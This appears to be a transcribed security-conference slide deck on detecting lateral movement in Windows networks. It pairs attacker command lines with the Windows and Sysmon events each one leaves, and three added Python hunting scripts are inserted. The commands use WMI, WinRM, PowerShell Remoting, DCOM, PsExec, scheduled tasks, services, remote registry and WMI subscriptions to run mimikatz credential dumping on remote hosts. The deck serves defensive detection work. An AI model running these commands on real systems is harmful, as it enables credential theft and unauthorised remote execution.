Lateral Movement in Windows Infrastructure (original SlideShare title: Горизонтальные перемещения в инфраструктуре Windows)

Talk language: Russian. Published in: Technology.

Speaker bio: has worked in both "paper" and hands-on information security for more than 6 years. SOC analyst at Kaspersky Lab. Formerly head of the information security department at an industrial enterprise. Holds specialist and master's degrees from SibSAU (Reshetnev Siberian State Aerospace University), where he later taught information security courses. Has taken part in a number of CTFs. Has spoken at ZeroNights.

Teymur Kheirkhabarov
1. Hunting Lateral Movement in Windows Infrastructure
Teymur Kheirkhabarov

2. Who Am I
• Senior SOC Analyst @Kaspersky Lab
• SibSAU (Krasnoyarsk) graduate
• Ex- Infosec dept. head
• Ex- Infosec admin
• Ex- System admin
• Twitter @HeirhabarovT
• www.linkedin.com/in/teymur-kheirkhabarov-73490867/

3. What are we going to talk about
• Different ways to launch executables remotely by using compromised credentials and operating system functionality;
• How to detect remotely launched executables with Windows Event and Sysmon logs.

4. Remote file copy over SMB
• Copy to autostart locations for execution on login or boot
• Copy to different locations for further execution via WMI, WinRM, Powershell Remoting, Task Scheduler, Service…
How
• Programmatically
• Using Explorer
• Using standard console tools (copy, xcopy, robocopy…):
  • robocopy C:\tools \\pc0002\ADMIN$\users\public mimikatz.exe
  • powershell Copy-Item -Path mimikatz.exe -Destination \\pc0002\C$\users\public
  • cmd /c "copy mimikatz.exe \\pc0002\C$\users\public"
  • xcopy mimikatz.exe "\\pc0002\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Requirements & limitations
• TCP/445 port is accessible on remote host
• Administrative shares are enabled on remote host

5. Remote File Copy over SMB – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. Administrative share access (Windows EID 5140/5145)
E4. File object access with WriteData or AddFile rights (Windows EID 4663) – if audit and SACL were configured

6. Remote File Copy over SMB – the most interesting events

7. Hunting: search for administrative shares connections

8. Windows File Auditing
https://www.malwarearchaeology.com/s/Windows-File-Auditing-Cheat-Sheet-ver-Oct-2016.pdf

9. Hunting: search for files creation/changes in autostart locations
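The hunt named on slides 7 and 9, as an added example that is not part of the original deck: it scans Windows EID 5145 records for writes through C$ or ADMIN$ that land in a Startup folder. The 5145 field names are the real ones; the event records, host names and addresses are constructed.

```python
"""Hunt for file writes into autostart folders over administrative shares (added example).

Works on Windows EID 5145 records: a write (AccessMask bit 0x2 = WriteData/AddFile)
through C$ or ADMIN$ whose RelativeTargetName lies in a Startup folder is flagged.
"""
import re

ADMIN_SHARES = {"ADMIN$", "C$"}
WRITE_DATA = 0x2  # WriteData and AddFile share this bit in the 5145 AccessMask

# Paths are relative to the share root; these patterns assume access through C$.
AUTOSTART_PATTERNS = [
    # all-users Startup folder
    re.compile(r"^ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I),
    # per-user Startup folder
    re.compile(r"^Users\\[^\\]+\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I),
]

def share_name(raw):
    # ShareName is logged as \\*\ADMIN$ ; keep only the bare share name
    return raw.rsplit("\\", 1)[-1].upper()

def is_autostart_path(relative_target):
    return any(p.search(relative_target) for p in AUTOSTART_PATTERNS)

def hunt_autostart_writes(events):
    """Return 5145 records that write into an autostart folder via an admin share."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 5145 or share_name(ev["ShareName"]) not in ADMIN_SHARES:
            continue
        if not int(ev["AccessMask"], 16) & WRITE_DATA:
            continue  # read or enumerate only: not a file drop
        if is_autostart_path(ev["RelativeTargetName"]):
            hits.append({"host": ev["Computer"], "source_ip": ev["IpAddress"],
                         "user": ev["SubjectUserName"], "share": share_name(ev["ShareName"]),
                         "target": ev["RelativeTargetName"]})
    return hits

# Constructed sample events (field names as in the real 5145 event).
def ev5145(mask, target, host="pc0002.test.local", ip="172.16.205.10"):
    return {"EventID": 5145, "Computer": host, "IpAddress": ip, "SubjectUserName": "dadmin",
            "ShareName": r"\\*\C$", "AccessMask": mask, "RelativeTargetName": target}

STARTUP = r"ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
SAMPLE_EVENTS = [
    ev5145("0x2", STARTUP + r"\update.exe"),                 # remote drop into all-users Startup
    ev5145("0x1", STARTUP + r"\update.exe"),                 # read of the same file: not flagged
    ev5145("0x2", r"Users\Public\update.exe"),               # write outside autostart: not flagged
    ev5145("0x12019f", r"Users\jsmith\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svc.exe",
           host="pc0003.test.local"),                        # drop into a user's Startup folder
]
```

Only the two drops into Startup folders are returned; the read-only access and the write into Users\Public are ignored, which is the distinction the 5145 AccessMask gives you that a share-connection event (5140) alone does not.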
10. Remote execution via WMI
How
• Programmatically
• Using standard tools:
  • wmic /node:pc0002 process call create "cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"
  • powershell Invoke-WmiMethod -ComputerName pc0002 -Class Win32_Process -Name Create -ArgumentList '"cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"'
  • powershell -command "&{$process = [WMICLASS]'\\pc0002\ROOT\CIMV2:win32_process'; $process.Create('calc.exe'); }"
  • powershell -command "&{$process = get-wmiobject -query 'SELECT * FROM Meta_Class WHERE __Class = \"Win32_Process\"' -namespace 'root\cimv2' -computername pc0002; $process.Create('notepad.exe');}"
Requirements & limitations
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host

11. Remote execution via WMI – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. WmiPrvSE.exe starts payload file (Sysmon EID 1)

12. Remote execution via WMI – the most interesting events

13. Remote execution via WinRM
How
• Programmatically
• Using Windows Remote Shell (WinRS) tool:
  • winrs -r:pc0002.test.local C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
  • winrs -r:pc0002.test.local -u:dadmin C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
Requirements & limitations
• WinRM is enabled on remote host (disabled by default on client Windows versions)
• TCP/5985 (TCP/5986) port is accessible on remote host

14. Remote execution via WinRM – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. svchost.exe starts WinrsHost.exe (Sysmon EID 1)
E4. WinrsHost.exe starts payload file (Sysmon EID 1)

15. Remote execution via WinRM – the most interesting events

16. Remote execution via Powershell Remoting
How
• Powershell scripts
• Powershell cmdline:
  • powershell Invoke-Command -ComputerName pc0002.test.local -ScriptBlock {cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\pc0002_mimikatz_output.txt}
  • powershell Invoke-Command -ComputerName pc0002.test.local -Credential TEST\dadmin -ScriptBlock {cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\pc0002_mimikatz_output.txt}
  • Enter-PSSession -ComputerName COMPUTER -Credential USER
Requirements & limitations
• WinRM is enabled on remote host (disabled by default on client Windows versions)
• TCP/5985 (TCP/5986) port is accessible on remote host

17. Remote execution via Powershell Remoting – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. svchost.exe starts wsmprovhost.exe (Sysmon EID 1)
E4. wsmprovhost.exe starts payload file (Sysmon EID 1)

18. Remote execution via Powershell Remoting – the most interesting events

19. Remote execution via MMC20.Application COM
How
• Programmatically
• Using powershell:
  powershell -command "&{$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Application','pc0002.test.local')); $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,'/c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\pc0002_mimikatz_output.txt','7')}"
Requirements & limitations
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

20. Remote execution via MMC20.Application COM – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. svchost.exe starts mmc.exe (Sysmon EID 1)
E4. mmc.exe starts payload file (Sysmon EID 1)

21. Remote execution via MMC20.Application COM – the most interesting events

22. Remote execution via PsExec (& clones, e.g. PaExec)
How
• PsExec:
  • psexec.exe \\pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
• PaExec:
  • paexec.exe \\pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
Requirements & limitations
• ADMIN$ administrative share is enabled on remote host
• TCP/445 port is accessible on remote host

23. Remote execution via PsExec (& clones) – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. Copying PSEXESVC.exe to ADMIN$ (Windows EID 5140/5145)
E4. psexesvc service is installed and started (Windows EID 7045/7036)
E5. psexesvc.exe is started by services.exe (Sysmon EID 1)
E6. psexesvc.exe starts payload file (Sysmon EID 1)
E7. Interaction with payload stdin/stdout/stderr via SMB pipes (Windows EID 5145)

24. Remote execution via PsExec (& clones) – the most interesting events

25. Hunting: search for PsExec (& clones) artifacts – services

26. Hunting: search for PsExec (& clones) artifacts – access to pipes

27. Remote execution via PsExec (& clones) – the most interesting events

28. Hunting: search for executions in network logon sessions (WinRM, WMI, PsExec, Powershell Remoting, MMC20 COM)
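The hunt on slide 28, as an added example that is not part of the original deck: it joins Sysmon process-creation events to EID 4624 network logons on the logon session id and tags the destination-side parent processes that the preceding slides identify for WMI, WinRM, PowerShell Remoting, MMC20 COM and PsExec. Event field names are the real ones; the records, hosts and addresses are constructed.

```python
"""Hunt for processes created inside network logon sessions (added example).

Joins Sysmon EID 1 (process creation) to Windows EID 4624 (logon) on the logon
session id: Sysmon's LogonId and 4624's TargetLogonId carry the same hex value.
"""
NETWORK_LOGON = 3
SYSMON_CHANNEL = "Microsoft-Windows-Sysmon/Operational"

# Destination-side parents of remotely started payloads, as listed on the slides.
REMOTE_EXEC_PARENTS = {
    "wmiprvse.exe",     # WMI (Win32_Process.Create)
    "winrshost.exe",    # WinRM / winrs
    "wsmprovhost.exe",  # PowerShell Remoting
    "mmc.exe",          # MMC20.Application DCOM
    "psexesvc.exe",     # PsExec service
}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def index_network_logons(events):
    """Map lower-cased TargetLogonId -> 4624 record, network logons (type 3) only."""
    return {ev["TargetLogonId"].lower(): ev for ev in events
            if ev.get("EventID") == 4624 and int(ev["LogonType"]) == NETWORK_LOGON}

def hunt_network_session_executions(events):
    """Return every Sysmon process creation whose logon session came over the network."""
    logons = index_network_logons(events)
    hits = []
    for ev in events:
        if ev.get("EventID") != 1 or ev.get("Channel") != SYSMON_CHANNEL:
            continue
        logon = logons.get(ev["LogonId"].lower())
        if logon is None:
            continue  # interactive/service session, or no matching 4624: not this hunt
        parent = basename(ev["ParentImage"])
        hits.append({"host": ev["Computer"], "source_ip": logon["IpAddress"],
                     "user": logon["TargetDomainName"] + "\\" + logon["TargetUserName"],
                     "parent": parent, "image": basename(ev["Image"]),
                     "command_line": ev["CommandLine"],
                     # parents named on the slides are tagged; others still surface for review
                     "known_remote_exec_parent": parent in REMOTE_EXEC_PARENTS})
    return hits

# Constructed sample events (field names as in the real 4624 and Sysmon EID 1 events).
def logon(logon_id, logon_type, ip, user="dadmin", domain="TEST"):
    return {"EventID": 4624, "LogonType": str(logon_type), "TargetLogonId": logon_id,
            "IpAddress": ip, "TargetUserName": user, "TargetDomainName": domain}

def proc(logon_id, parent, image, cmdline, host="pc0002.test.local"):
    return {"EventID": 1, "Channel": SYSMON_CHANNEL, "Computer": host, "LogonId": logon_id,
            "ParentImage": parent, "Image": image, "CommandLine": cmdline}

SAMPLE_EVENTS = [
    logon("0x3E7A1B", 3, "172.16.205.10"),            # network logon from a remote host
    logon("0x1A2B3", 2, "-", user="jsmith"),          # interactive console logon
    logon("0x5C9D0", 3, "172.16.205.10"),
    proc("0x3e7a1b", r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\cmd.exe", "cmd /c whoami"),
    proc("0x1a2b3", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    proc("0x5c9d0", r"C:\Windows\System32\wsmprovhost.exe", r"C:\Windows\System32\cmd.exe", "cmd /c hostname"),
]
```

The join on LogonId is what makes this a single hunt across all the techniques: the process tree differs per technique (WmiPrvSE, WinrsHost, wsmprovhost, mmc, psexesvc), but the payload always runs in a session whose 4624 has LogonType 3 and a remote IpAddress.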
29. Remote execution via ShellWindows COM
How
• Programmatically
• Using powershell:
  powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39','pc0002')); $obj.item().Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:\Windows\System32',$null,0)}"
Requirements & limitations
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
• Execution with rights of currently logged user
https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

30. Remote execution via ShellBrowserWindow COM
How
• Programmatically
• Using powershell:
  powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880','pc0002')); $obj.Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:\Windows\System32',$null,0)}"
Requirements & limitations
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
• Doesn't work for Windows 7 destination
• Execution with rights of currently logged user
https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

31. Remote execution via ShellWindows or ShellBrowserWindow COM – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. explorer.exe starts payload file in current session (Sysmon EID 1)

32. Remote execution via ShellWindows or ShellBrowserWindow COM – how to detect???
Payload file is executed in the session of the current active user

33. Remote execution via Scheduled Tasks
How
• Programmatically
• Standard command line tools:
  • at \\172.16.205.14 3:55 C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> win_mimikatz_output.txt
  • schtasks /create /S pc0002 /SC ONCE /ST 00:57:00 /TN "Adobe Update" /TR "cmd.exe /c C:\users\public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"
Requirements & limitations
• TCP/135 port and RPC dynamic port range are accessible on remote host (in case of Schtasks usage)
• TCP/445 port is accessible on remote host (in case of AT usage)

34. Remote execution via Scheduled Tasks – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. Access to atsvc SMB pipe (Windows EID 5145) – in case of at.exe usage
E4. Scheduled task is created or updated (Windows EID 4698/4702)
E5. Task is triggered. svchost.exe starts taskeng.exe (Sysmon EID 1)
E6. taskeng.exe starts payload file (Sysmon EID 1)
Also there are some interesting events in the Microsoft-Windows-TaskScheduler/Operational log.

35. Remote execution via Scheduled Tasks – the most interesting events

36. Hunting: search for remotely created or updated scheduler tasks

37. Remote execution via Scheduled Tasks – the most interesting events

38. Hunting: search for ATSVC pipe connections

39. Remote execution via Services
How
• Programmatically
• Standard command line tool:
  • sc \\pc0002 create "Remote service" binPath= "cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"
  • sc \\pc0002 start "Remote service"
  • sc \\pc0002 delete "Remote service"
Requirements & limitations
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host

40. Remote execution via Services – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. New service is installed (Windows EID 7045/4697)
E4. Start command is sent to installed service. services.exe starts payload file (Sysmon EID 1)
E5. A timeout is reached (Windows EID 7009)
E6. Failure while trying to start service (Windows EID 7000)

41. Remote execution via Services – the most interesting events

42. Hunting: search for remotely created services

43. Remote registry
How
• Programmatically
• Using powershell or reg:
  • reg add \\pc0002\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v GoogleUpdater /t REG_SZ /d "cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"
  • powershell -command "&{$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine','pc0002'); $key=$reg.OpenSubKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',$True); $key.SetValue('GoogleUpdater','calc.exe');}"
Requirements & limitations
• TCP/445 port is accessible on remote host
• Remote Registry service is enabled on remote host

44. Remote registry – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. WINREG pipe access (Windows EID 5145)
E4. Registry value is modified (Windows EID 4657) – if audit and SACL were configured

45. Remote Registry – the most interesting events

46. Hunting: search for WINREG pipe connections
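The pipe hunts on slides 26 (PsExec pipes), 38 (ATSVC) and 46 (WINREG) share one mechanism, so this added example, which is not part of the original deck, covers all three: EID 5145 records whose ShareName is IPC$ are classified by pipe name and then summarised per source address. The PsExec pipe naming (PSEXESVC plus PSEXESVC-host-pid-stdin/stdout/stderr) is the tool's documented behaviour; the PaExec prefix rule is an assumption, and the sample records are constructed.

```python
"""Hunt for remote-management named pipes opened over IPC$ (added example).

Windows EID 5145 logs pipe access with ShareName \\*\IPC$ and the pipe name in
RelativeTargetName. The pipes below are the ones the slides point at: PsExec's
PSEXESVC control pipe and its std* pipes, atsvc (at.exe / Task Scheduler RPC)
and winreg (Remote Registry RPC).
"""
import re
from collections import defaultdict

# PsExec: control pipe PSEXESVC, per-session pipes PSEXESVC-<host>-<pid>-stdin/stdout/stderr.
# PaExec (clone) is matched by the same name-prefix rule; its exact naming is assumed here.
PIPE_RULES = [
    ("PsExec/PaExec remote execution", re.compile(r"^(psexesvc|paexec)($|-)", re.I)),
    ("Task Scheduler RPC (at.exe / ATSVC)", re.compile(r"^atsvc$", re.I)),
    ("Remote Registry RPC (WINREG)", re.compile(r"^winreg$", re.I)),
]

def classify_pipe(pipe_name):
    """Return the rule label for a pipe name, or None if it is not of interest."""
    for label, pattern in PIPE_RULES:
        if pattern.search(pipe_name):
            return label
    return None

def hunt_pipe_connections(events):
    """Return 5145 records for IPC$ pipe access matching one of PIPE_RULES."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 5145 or not ev["ShareName"].upper().endswith("\\IPC$"):
            continue
        label = classify_pipe(ev["RelativeTargetName"])
        if label:
            hits.append({"host": ev["Computer"], "source_ip": ev["IpAddress"],
                         "user": ev["SubjectUserName"], "pipe": ev["RelativeTargetName"],
                         "technique": label})
    return hits

def summarize_by_source(hits):
    """Group hits by source IP: one workstation touching several hosts/techniques stands out."""
    summary = defaultdict(lambda: {"hosts": set(), "techniques": set()})
    for h in hits:
        summary[h["source_ip"]]["hosts"].add(h["host"])
        summary[h["source_ip"]]["techniques"].add(h["technique"])
    return dict(summary)

# Constructed sample events (field names as in the real 5145 event).
def ev5145(share, target, host="pc0002.test.local", ip="172.16.205.10"):
    return {"EventID": 5145, "Computer": host, "IpAddress": ip, "SubjectUserName": "dadmin",
            "ShareName": share, "RelativeTargetName": target}

SAMPLE_EVENTS = [
    ev5145(r"\\*\IPC$", "atsvc"),                              # at.exe scheduling a task
    ev5145(r"\\*\IPC$", "PSEXESVC"),                           # PsExec control pipe
    ev5145(r"\\*\IPC$", "PSEXESVC-WS01-4128-stdin"),           # PsExec payload stdin
    ev5145(r"\\*\IPC$", "srvsvc"),                             # share enumeration: not flagged
    ev5145(r"\\*\C$", r"Users\Public\update.exe"),             # file share access, not a pipe
    ev5145(r"\\*\IPC$", "winreg", host="pc0003.test.local"),   # remote registry on another host
]
```

The per-source summary is the part worth keeping in a SIEM: a single client address that reaches the atsvc, winreg and PSEXESVC pipes on several hosts within a short window is the lateral-movement pattern the slides describe, whereas any one of those pipes on its own is routine administration on many networks.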
47. Windows Registry Auditing
https://www.malwarearchaeology.com/s/Windows-Registry-Auditing-Cheat-Sheet-ver-Oct-2016.pdf

48. Hunting: search for changes in autostart registry keys

49. Remote WMI subscriptions creation
  $filterName = 'TestFilter'
  $consumerName = 'TestConsumer'
  $exePath = 'C:\Windows\System32\calc.exe'
  $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"
  $WMIEventFilter = Set-WmiInstance -ComputerName pc0002 -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
  $WMIEventConsumer = Set-WmiInstance -ComputerName pc0002 -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
  Set-WmiInstance -ComputerName pc0002 -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}

50. WMI Namespaces Auditing

51. Remote WMI subscriptions creation – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. Writing to WMI Namespace (Windows EID 4662) – if audit and SACL were configured

52. Remote WMI subscriptions creation – the most interesting events

53. The End
• There are a lot of ways to remotely run executables in Windows infrastructure;
• Most of them are based on the native capabilities of the Windows operating system;
• Almost all of them can be detected via Windows or Sysmon logs analysis;
• Out of scope:
  • exploitation of vulnerabilities;
  • third-party applications and software deployment systems (SCCM, Kaspersky Security Center, VNC, WSUS…).

54. Teymur Kheirkhabarov
• heirhabarov@gmail.com
• Twitter @HeirhabarovT
• http://www.linkedin.com/in/teymur-kheirkhabarov-73490867/